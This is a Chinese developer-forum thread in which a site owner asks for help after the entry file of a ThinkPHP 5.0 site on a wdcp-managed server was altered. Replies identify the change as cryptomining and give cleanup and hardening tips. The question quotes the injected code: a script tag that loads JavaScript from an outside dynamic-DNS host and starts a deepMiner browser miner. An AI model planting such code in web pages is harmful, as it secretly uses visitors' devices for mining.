服务器又被入侵

发布于
2018-01-27

更新于
2018-02-01

使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西

求大佬!!!

阿里云服务器

wdlinux 系统

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
        if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
        }
        </script>";

php 安全 linux

阅读 7.9k

11 个回答

buff

发布于
2018-02-01

更新于
2018-02-02

✓ 已被采纳

1.下载https://greenindex.dynamic-dn...
2.在函数deAES中将返回的字符串输出到控制台中,这些字符串就是真正运行的代码.
3.然后代入他下面写的运行代码,在中间调试.一步步调试最多半天就能知道他干嘛的了.

发布于
2018-02-02

貌似挖矿用的
 https://github.com/deepwn/dee...

一人破万军

发布于
2018-01-27

这个是修改PHP后的，

你应找到是哪里注入这一段。建议检查GET,POST

PFinal南丞_

发布于
2018-02-01

先找一找是哪里出现的漏洞,注入啊！文件包含啊! 然后看一下文件的权限

发布于
2018-02-01

先修改文件属性，比如说把owner变成root:root

发布于
2018-02-01

先把日志搂出来审计一遍

发布于
2018-02-02

新手上路，请多包涵

最近留意到几次这样的入侵
请问楼主服务器上是否安装了 FTP ？
电脑上使用的 FTP 客户端是？
我怀疑是 FTP 客户端上的后门

疯子先生

发布于
2018-02-04

如果这代码是入侵者留下的，可以告诉你，你的每一个用户在帮他挖矿。

Aren

发布于
2018-02-18

新手上路，请多包涵

楼主，我的也中招了！
不是用TP的。
但是也是使用wdcp这个来搭的。
也是直接在我的程序入口处加了你贴出的那段代码。
查也查不到头绪。不知道是从哪里黑进来的。

发布于
2018-02-21

更新于
2018-02-21

我觉得问题出在tp或者程序的可能性更大一些。

wdlinux wdcp的重点在控制面板，安全需要自己做。先推荐把php整一整，apache权限，其次是ssh端口，关ftp，防火墙等等。

屏蔽php高危函数
http://www.yunxi365.cn/index....

发布于
2018-02-01

你是是什么网站系统呀，用什么服务器呀，最近好多人都被入侵了呢。

撰写回答

你尚未登录，登录后可以

和开发者交流问题的细节
关注并接收问题和回答的更新提醒
参与内容的编辑和改进，让解决方法与时俱进

推荐问题

相似问题

找不到问题？创建新问题